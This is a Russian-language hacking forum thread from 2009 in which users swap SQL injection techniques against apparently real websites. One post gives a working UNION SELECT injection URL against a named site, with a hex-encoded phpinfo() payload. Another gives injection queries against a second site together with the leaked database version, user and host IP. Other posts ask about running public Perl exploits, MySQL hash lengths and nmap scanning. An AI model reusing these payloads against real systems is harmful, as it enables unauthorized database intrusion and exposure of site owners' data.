HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.04.2009, 03:48
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

www.zemskov.ru

таких вообще много где в конце .html

но толком не знаю kak делать запрос.
кто нибудь может показать на примере или мост есть статья .
 
Ответить с цитированием

  #2  
Старый 14.04.2009, 05:22
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Забавная инъекция
Код:
http://www.zemskov.ru/e_mail' and 1=2 union select 1,0x706870696e666f28293b,3,4,5,6,7,8,9,10,11,12,13,14,15+--+.html
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 14.04.2009 в 05:41..
 
Ответить с цитированием

  #3  
Старый 14.04.2009, 05:30
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

откудого ты подобрал эти символы ??
%20 это видимо пробле. а остальное ?


спасибо )
 
Ответить с цитированием

  #4  
Старый 14.04.2009, 05:42
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

0x706870696e666f28293b=phpinfo();
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #5  
Старый 14.04.2009, 12:35
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

Цитата:
http://site.ru/tv/?prn&ch=1&rubrics[]=1'
есть ли тут инжект?
Код:
http://site.ru//tv/?prn&ch=1&rubrics[]=1)+order+by+1--+
http://site.ru/tv/?prn&ch=1&rubrics[]=-1)+union+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11--+
5.0.22-log:xmlvlru:xmlvlru@80.92.162.206:redhat-linux-gnu

Последний раз редактировалось farex; 15.04.2009 в 11:46.. Причина: по просьбе #Wolf# зетер урл..........
 
Ответить с цитированием

  #6  
Старый 14.04.2009, 16:34
neverdie
Новичок
Регистрация: 20.03.2009
Сообщений: 4
Провел на форуме:
26394

Репутация: 5
По умолчанию

народ вот есть много эксплойтов под разны уязвимости... в общем в чем вопрос: я когда сохраняю сплойт например на перл абсолютно не изменяя его ввожу в cmd cd C:\perl\bin
perl sploit.pl
нажимаю enter вроде должен запуститься но пишет ошибку синтаксиса, хз почему, в чем может быть проблема , и так со всеми сплойтами абсолютно, переустановка компилятора не помогла
 
Ответить с цитированием

  #7  
Старый 14.04.2009, 17:21
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

neverdie
Это происходит потому, что в сплоитах с паблика очень часто НАМЕРЕННО сделаны ошибки, обычно мелкие синтаксические, для того, что-бы откровенные нубы не могли им воспользоваться.

Т.е: ищи ошибку , исправляй и юзай

PS Только не нужно сюда копипастить сплоит с просьбой найти ошибку, их не для этого там делают
 
Ответить с цитированием

  #8  
Старый 14.04.2009, 17:38
neverdie
Новичок
Регистрация: 20.03.2009
Сообщений: 4
Провел на форуме:
26394

Репутация: 5
По умолчанию

хм, ну php я более менее шарю а вот перл хз, ну ошибки это подло )))) а как их находить-то если не оч разбираешься в синтаксисе это ж не html редактировать)
 
Ответить с цитированием

  #9  
Старый 14.04.2009, 18:17
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Цитата:
Сообщение от neverdie  
хм, ну php я более менее шарю а вот перл хз, ну ошибки это подло )))) а как их находить-то если не оч разбираешься в синтаксисе это ж не html редактировать)
Тогда тебе не повезло, учи перл...
 
Ответить с цитированием

  #10  
Старый 14.04.2009, 20:07
FarIZ
Новичок
Регистрация: 16.03.2009
Сообщений: 24
Провел на форуме:
62919

Репутация: 2
По умолчанию

короче не обессудьте,
вопрос
в форум о хешах не пишу, потому как молчат там все

насколько я знаю, у mysql5 длина 40 байтов . а какая длина у mysql ?
спрашиваю потому что хеши которые я выдрал из 4 версии имеют длину 40


и второй вопрос .

есть сайт . сканирую nmap-ом, диапазон портов не задаю, т.е. должно использоваться сканир. стандартн. портов .
но сканер выдает бесконечный ряд всевозможных открытых портов, среди них есть и
2, 3, 4 , 5 - значные, короче любые . и главное , скан не заканчивается .

как мне нормально отсканировать сайт ? может в опциях указать что-нибудь
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ